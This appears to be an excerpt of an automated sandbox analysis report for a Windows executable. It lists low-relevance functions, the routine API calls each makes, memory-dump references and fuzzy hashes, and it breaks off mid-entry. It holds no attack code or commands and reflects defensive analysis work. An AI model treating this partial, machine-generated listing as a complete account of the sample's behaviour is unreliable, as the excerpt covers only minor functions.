                                                  Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                  • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: MessageSend
                                                  • String ID:
                                                  • API String ID: 3850602802-0
                                                  • Opcode ID: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                  • Instruction ID: eaafb4699c1cdf5c6f59fde68eca766a765a16907ebce13606274643e5ac5f14
                                                  • Opcode Fuzzy Hash: 819fad79445c3595f7b9f28f54206bfd84f40695cc559c75429dbb5a445ae89f
                                                  • Instruction Fuzzy Hash: 8D0128316242209FE7095B789D05B6A3698E710715F14463FF851F62F1D678CC429B4C
                                                  Function 00402388 Relevance: 3.0, APIs: 2, Instructions: 39registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 004023AA
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004023B3
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CloseDeleteValue
                                                  • String ID:
                                                  • API String ID: 2831762973-0
                                                  • Opcode ID: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                  • Instruction ID: a65daa511511277569afb244ca8fe97b80a25767db049908362439423f8cf232
                                                  • Opcode Fuzzy Hash: 521e33bf1c8ff9c3df6ac7757e7f8edd3bb41d92ca0b3b7281954678aee4cd22
                                                  • Instruction Fuzzy Hash: E5F09632A041149BE711BBA49B4EABEB2A99B44354F16043FFA02F71C1DEFC4D41966D
                                                  Function 00401E43 Relevance: 3.0, APIs: 2, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                  • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Window$EnableShow
                                                  • String ID:
                                                  • API String ID: 1136574915-0
                                                  • Opcode ID: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                  • Instruction ID: 09ae210f1740f3e2fd0b4033472822fcab18c129469b5f5a82ca29d8a3c9addd
                                                  • Opcode Fuzzy Hash: 2eb542d08f3645705a96f7068f662fa96ba88c07949deaf1805fa2c2c225f25f
                                                  • Instruction Fuzzy Hash: DEE09232E082008FD7149BA5AA494AD77B4EB84364720403FE112F11C1DA7848418F59
                                                  Function 0040665C Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(?,00000020,?,004033E5,0000000A), ref: 0040666E
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00406689
                                                    • Part of subcall function 004065EC: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406603
                                                    • Part of subcall function 004065EC: wsprintfW.USER32 ref: 0040663E
                                                    • Part of subcall function 004065EC: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406652
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                  • String ID:
                                                  • API String ID: 2547128583-0
                                                  • Opcode ID: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                  • Instruction ID: f71ddd0ba98f8a8be4c3f380e987b43417b0e7e7cad23f5b62dfe7414387192f
                                                  • Opcode Fuzzy Hash: 67dc6ca41c2bc7bd5b2f809cbb82f8f2c1b847e00e9086bd1828883d4f03c685
                                                  • Instruction Fuzzy Hash: 18E026321002016AC7008A305E4083763AC9B85340303883FFD46F2081DB39DC31A6AD
                                                  Function 00405D74 Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\3507071243740008011.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D78
                                                  • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D9A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: File$AttributesCreate
                                                  • String ID:
                                                  • API String ID: 415043291-0
                                                  • Opcode ID: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                  • Instruction ID: 684cdbd871a87963be1dc25f749e3f1c2e3aca1a790447dc63e6e481d8426dbe
                                                  • Opcode Fuzzy Hash: e3266cf20b616526e148e4639a7b0fb2c73eec3b674a7d239963b130731368bc
                                                  • Instruction Fuzzy Hash: 5DD09E31254301AFEF098F20DE16F2EBBA2EB84B05F11552CB786940E0DA7158199B15
                                                  Function 00405832 Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,00403366,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,004035BF,?,00000006,00000008,0000000A), ref: 00405838
                                                  • GetLastError.KERNEL32(?,00000006,00000008,0000000A), ref: 00405846
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectoryErrorLast
                                                  • String ID:
                                                  • API String ID: 1375471231-0
                                                  • Opcode ID: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                  • Instruction ID: 034de6f099216337e7681325378c15a49c0ca39433587e883605b7c80b1fabea
                                                  • Opcode Fuzzy Hash: 5aaa147db34fee021f71137ce00f1128120fffe197b4e0338bd4cd09c611a0b2
                                                  • Instruction Fuzzy Hash: C8C08C312155019AC7002F219F08B0B3A50AB20340F018439A946E00E0DA308424DD2D
                                                  Function 10001272 Relevance: 2.5, APIs: 2, Instructions: 22memorystringCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GlobalAlloc.KERNELBASE(00000040,?,?,1000155E,?), ref: 10001288
                                                  • lstrcpynW.KERNEL32(00000004,?,?,1000155E,?), ref: 1000129E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: AllocGloballstrcpyn
                                                  • String ID:
                                                  • API String ID: 3204721840-0
                                                  • Opcode ID: afe45deed3c66b3a0d284d3e9d1cbe2d2ade6927c8a4a5a8782c6529d192ae48
                                                  • Instruction ID: e9b740c6d8b694a709cf830eb31a0a27ff166fa851e2490f9389895f26a0ffec
                                                  • Opcode Fuzzy Hash: afe45deed3c66b3a0d284d3e9d1cbe2d2ade6927c8a4a5a8782c6529d192ae48
                                                  • Instruction Fuzzy Hash: D8F0A5B5504220DFF701CFA4D888E5677E8FB48380B028655FA45D7228CB30A810CB65
                                                  Function 004027E9 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402807
                                                    • Part of subcall function 004061C9: wsprintfW.USER32 ref: 004061D6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FilePointerwsprintf
                                                  • String ID:
                                                  • API String ID: 327478801-0
                                                  • Opcode ID: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                  • Instruction ID: 338d2460217d73ea2e2bb91e7847e27d4a9cf2f97daf1e2edf82c438741940a9
                                                  • Opcode Fuzzy Hash: 25119fcbc0a3167edfdd7d21477dcc65c7f09cfc642675181383071420b6b3c2
                                                  • Instruction Fuzzy Hash: 83E09271B00104AFDB11EBA5AE498AE7779DB80314B24403BF101F50D2CA794E119E2D
                                                  Function 00402306 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 0040233D
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileStringWrite
                                                  • String ID:
                                                  • API String ID: 390214022-0
                                                  • Opcode ID: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                  • Instruction ID: f718b570c03cd879152723008abd35f840e0595a9afadee28286a7759bd10add
                                                  • Opcode Fuzzy Hash: 611604a497d22fd9b22a7666efc1e18301a5eb9844a24c96cea5756000cc0278
                                                  • Instruction Fuzzy Hash: A1E086719042686EE7303AF10F8EDBF50989B44348B55093FBA01B61C2D9FC0D46826D
                                                  Function 0040611D Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegCreateKeyExW.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CE8,00000000,?,?), ref: 00406146
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction ID: 190238b8cd19dd4efab6c9cc8903e135eae53195524c7f3a74b1c4143961a507
                                                  • Opcode Fuzzy Hash: e8292e86e66d8bfc399a73dea3ede4946860b06fd3b50e0b30bb299c90100862
                                                  • Instruction Fuzzy Hash: A1E0E6B2010109BEDF095F50DD0AD7B371DEB04704F01452EFA57D5091E6B5A9309679
                                                  Function 00405E26 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,004032DE,000000FF,00416A00,?,00416A00,?,?,00000004,00000000), ref: 00405E3A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileWrite
                                                  • String ID:
                                                  • API String ID: 3934441357-0
                                                  • Opcode ID: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction ID: 087a0ba252b1651b23da729bb4e18d02a4b8a10c1fd3406c9ee2a7e33144c981
                                                  • Opcode Fuzzy Hash: 02dc4867d73beddbae7b6aa94ca18310df5187db1130d79069d379e72bcbc858
                                                  • Instruction Fuzzy Hash: 96E0463221021AABCF10AF50CC04AAB3B6CFB003A0F004432B955E2050D230EA208AE9
                                                  Function 00405DF7 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,?,?,00403328,00000000,00000000,0040314C,?,00000004,00000000,00000000,00000000), ref: 00405E0B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: FileRead
                                                  • String ID:
                                                  • API String ID: 2738559852-0
                                                  • Opcode ID: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction ID: e221de633d5b74da9fce23a9c995dc3304d5126a795d503f9c3389b6b2e666c2
                                                  • Opcode Fuzzy Hash: 7739e01b11ed9e02f3c754170f73e593db9a2046c62570b976e55369a775b70d
                                                  • Instruction Fuzzy Hash: 4DE0EC3221025AABDF10AF95DC00EEB7B6CEB05360F044436FA65E7150D631EA619BF8
                                                  Function 100027C2 Relevance: 1.5, APIs: 1, Instructions: 21memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2647896166.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                  • Associated: 00000000.00000002.2647879368.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647911414.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000000.00000002.2647926767.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_10000000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: ProtectVirtual
                                                  • String ID:
                                                  • API String ID: 544645111-0
                                                  • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction ID: 43a77b614ff4017466e57d7f63f0e44ab05d53355a3bca00642047650885b550
                                                  • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                  • Instruction Fuzzy Hash: C5F0A5F15057A0DEF350DF688C847063BE4E3583C4B03852AE368F6269EB344454DF19
                                                  Function 00402348 Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 00402379
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: PrivateProfileString
                                                  • String ID:
                                                  • API String ID: 1096422788-0
                                                  • Opcode ID: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                  • Instruction ID: 69d349e7d285c822079f9e4bf846872a9f1ef35916f06b7134f04da07b3971da
                                                  • Opcode Fuzzy Hash: c6a8cbcbc31f6e602369a5318af1bf20fc7f19c6dcae62e72b5fc0541244e301
                                                  • Instruction Fuzzy Hash: 25E0487080420CAADB106FA1CE099BE7A64AF00340F104439F5907B0D1E6FC84415745
                                                  Function 004060EF Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,0042C228,?,?,0040617D,0042C228,00000000,?,?,Call,?), ref: 00406113
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2641054685.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2641036423.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641072711.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641090860.0000000000468000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2641196627.000000000046A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_3507071243740008011.jbxd
                                                  Similarity
                                                  • API ID: Open
                                                  • String ID:
                                                  • API String ID: 71445658-0
                                                  • Opcode ID: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction ID: 3f4f51c5761301f24834a255f16e5381e59d2a113ab40b24d84d285923e9a67b
                                                  • Opcode Fuzzy Hash: a8e94fdf895113144ef30ac0413fc9f69bed743b5e5124c6f76e238eb3875bc5
                                                  • Instruction Fuzzy Hash: 47D0173604020DBBEF119F90ED01FAB3B6DAB08314F014826FE16A80A2D776D530AB68
                                                  Function 0040424C Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                  Download Yara Rule
                                                  APIs
